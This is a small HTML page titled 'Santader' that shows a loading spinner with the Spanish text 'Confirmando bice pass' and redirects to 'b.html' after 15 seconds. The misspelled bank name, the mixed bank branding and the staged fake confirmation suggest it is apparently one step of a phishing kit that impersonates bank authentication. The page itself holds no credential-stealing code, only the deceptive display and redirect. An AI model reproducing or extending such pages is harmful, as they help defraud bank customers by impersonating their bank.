<!DOCTYPE html>
<html>
<head>
    <title>Santader</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>
        body {
            margin-top: 100px;
            background-color: #FFFFFF;
            color: #fff;
            text-align: center;
        }

        h1 {
            font: 1.5em 'Roboto', sans-serif;
            margin-bottom: 30px;
        }

        .spin {
            display: inline-block;
            width: 100px;
            height: 100px;
            border: 10px solid rgba(255, 255, 255, .3);
            border-radius: 50%;
            border-top-color: #007bff;
            animation: spin 1s ease-in-out infinite;
            -webkit-animation: spin 1s ease-in-out infinite;
        }

        @keyframes spin {
            to {
                -webkit-transform: rotate(360deg);
            }
        }

        @-webkit-keyframes spin {
            to {
                -webkit-transform: rotate(360deg);
            }
        }
    </style>
</head>
<body>
<div class="spin"></div></br></br></br>
<FONT COLOR="#010101"><h1>Confirmando bice pass</h1></br></br></br>

<script>
    setTimeout(function(){
        window.location.href = 'b.html';
    }, 15000); // 15 segundos de tiempo de espera antes de redirigir
</script>

</body>
</html>